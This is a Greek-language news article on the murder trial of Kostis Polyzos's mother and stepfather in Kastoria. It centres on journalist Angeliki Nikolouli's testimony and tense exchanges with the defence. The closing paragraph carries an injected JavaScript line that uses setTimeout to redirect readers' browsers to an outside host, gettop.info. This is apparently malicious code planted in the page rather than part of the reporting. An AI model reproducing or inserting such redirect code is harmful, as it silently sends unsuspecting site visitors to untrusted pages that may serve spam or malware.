Υπόθεση Κωστή Πολύζου – Η Αγγελική Νικολούλη «καίει» τη μητέρα (ΒΙΝΤΕΟ)

0
38

 

Για δεύτερη ημέρα συνεχίζεται η δίκη της μητέρας και του πατριού του Κωστή Πολύζου στο Μικτό Ορκωτό Δικαστήριο της Καστοριάς.

Τα μέτρα της Αστυνομίας είναι δρακόντεια και πραγματοποιείται σωματικός έλεγχος σε όσους εισέρχονται στη δικαστική αίθουσα.

Ως μάρτυρας προσήλθε η γνωστή δημοσιογράφος Αγγελική Νικολούλη η οποία έχει εντρυφήσει στην υπόθεση ενώ δέχτηκε και την επίθεση από τον συνήγορο υπεράσπισης των κατηγορουμένων. Κατά την κατάθεσή της υπήρξαν αρκετές στιγμές έντασης.

Όπως γράφει το kozanilife.gr, η Αγγελική Νικολούλη, σε ερωτήσεις του συνήγορου υπεράσπισης σχετικά με το μοιραίο βράδυ, δήλωσε:

«Φαντάζομαι ότι μεταξύ 01:00-03:00 έγινε ότι έγινε, αφού μετά τη 00:00 δεν τον είδε κανείς να βγαίνει, ενώ στις 03:00 τηλεφώνησε η μητέρα του Κωστή στον φίλο του, Σπύρο. Ο Κωστής πριν πέσει για ύπνο, καληνύχτισε τη θεία του, δείχνοντας πως δεν έχει πρόθεση να βγει. Κατά τη δική μου εκτίμηση, στη διάρκεια της μεταφοράς και της ταφής, όπως δείχνουν τα στοιχεία, οι δράστες είναι δύο».

Οι ερωτήσεις του συνήγορου υπεράσπισης συνεχίστηκαν σε αρκετά έντονο τόνο, με την Αγγελική Νικολούλη να λέει: «Μη φωνάζετε σας παρακαλώ, σας έδωσα την εντύπωση ότι είμαι κουφή;».

Τέλος, ο Πρόεδρος του δικαστηρίου ανέφερε πως: «Φτάσαμε σε σημείο να αντιδικούμε την κα. Νικολούλη! Δεν δικάζουμε αυτήν!»

Η κ. Νικολούλη είπε αναλυτικά για τον αδερφό του Κωστή:  «Όταν ξεκίνησαν οι έρευνες της εκπομπής, είπα στην κ. Δέσποινα ότι για να καταλάβουμε τι έγινε θα πρέπει να πάμε στον τόπο και πήγαμε.

Έβρεχε καταρρακτωδώς. Μια κυρία άκουσε τα παντζούρια και βγήκε να δει και είδε τον Κωστή μετά τις 23:00 της νύχτας να μπαίνει στο σπίτι. Τον άκουσα να μπαίνει, αλλά δεν τον άκουσα να βγαίνει, είπε χαρακτηριστικά. Η μητέρα ισχυρίστηκε ότι τον έστειλε έξω τον Κωστή γιατί είχε μια βλάβη η εξωτερική βρύση.

Η γλώσσα του σώματος από αυτά που μου έλεγε ο μικρός αδερφός του Κωστή, ήταν διαφορετική από αυτά που ήθελε να πει. Με ειδικούς εξετάσαμε το βίντεο της κατάθεσης του μικρού, οι οποίοι επιβεβαίωσαν ότι δεν «ζει» την κατάθεσή του.

Την Παρασκευή που βρέθηκε το πτώμα, κάποια στιγμή πλησίασα τον μικρό και του είπα: Μήπως θυμάσαι κάτι άλλο, μήπως έκανες λάθος; Και μου απάντησε, «θέλω τη μαμά μου!».

Για τη στάση της μητέρας του Κωστή Πολύζου τη στιγμή που ανακαλύφθηκε το πτώμα είπε: «Όταν βρέθηκε το πτώμα του Κωστή, η κ. Κουτσέγκου αδιαφόρησε! Όταν βρίσκεις το παιδί σου νεκρό, σκίζεις τη γη με τα νύχια! Τις πρώτες στιγμές αφότου βρέθηκε το πτώμα, η ίδια με ρωτούσε τι ακριβώς δήλωσαν οι μάρτυρες. Σε όλα τα τηλέφωνα και σε όλη την επικοινωνία που είχαμε, έδειχνε αδιαφορία. Όσο βρισκόταν στην Ελευσινα, ήταν αδιάφορη. Όταν πηγαινε στη Σιάτιστα και βρισκόταν με συγγενείς, τότε έκλαιγε με λυγμούς και έλεγε συνέχεια βρείτε τους δολοφόνους του παιδιού μου.

Με αφορμή το ότι τους καταγράψαμε χωρίς τη θέλησή τους, μας κατήγγειλαν στο ΕΣΡ.

Όλη η κοινωνία αντιδρούσε και ήθελε να συνεχίσουμε τις έρευνες και η ίδια η μητέρα δεν ήθελε. Από εκεί και πέρα άρχισαν να βγαίνουν και άλλα στοιχεία στο φως, όπως τα δάνεια που είχε ο Κωστής.

Κάναμε μεγάλη έρευνα για το αυτοκίνητο. Ανακαλύψαμε ότι ο κ. Ντιος το είχε πουλήσει και το είχε κάνει 11 βιολογικούς καθαρισμούς! Στο εσωτερικό της κουκούλας του αυτοκινήτου βρέθηκαν κηλίδες αίματος, όπως επιβεβαίωσε ο κ. Πιτσιάβας, γενετιστής και συνεργάτης του FBI».

Μετά την ολοκλήρωση της πολύωρης κατάθεσης και εξέτασης της Αγγελικής Νικολούλη, κανονικά συνεχίζεται η ακροαματική διαδικασία με τις καταθέσεις των μαρτύρων.

Τις καταθέσεις ξεκίνησε συνάδελφος του πατριού του Κωστή, ο οποίος ισχυρίστηκε ότι βρισκόταν σε επικοινωνία με τον πατριό και τη μητέρα του άτυχου Κωστή, από την πρώτη στιγμή της εξαφάνισής του, κάτι όμως που αποδείχθηκε ότι δεν ισχύει, μιας και ο Πρόεδρος ανοίγοντας τα πρακτικά, ανέφερε πως δεν υπάρχουν οι συγκεκριμένες κλήσεις καταγεγραμμένες! Μάλιστα, ο πρόεδρος, πίεσε τον συγκεκριμένο μάρτυρα, λέγοντάς του: «Περιμένω να μου πείτε την αλήθεια

Ιδιαίτερο ενδιαφέρον θα έχει η μαρτυρία του ανήλικου αδερφού του Κωστή Πολύζου που αναμένεται να δώσει τις επόμενες ώρες, σύμφωνα με το kozanilife.gr. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here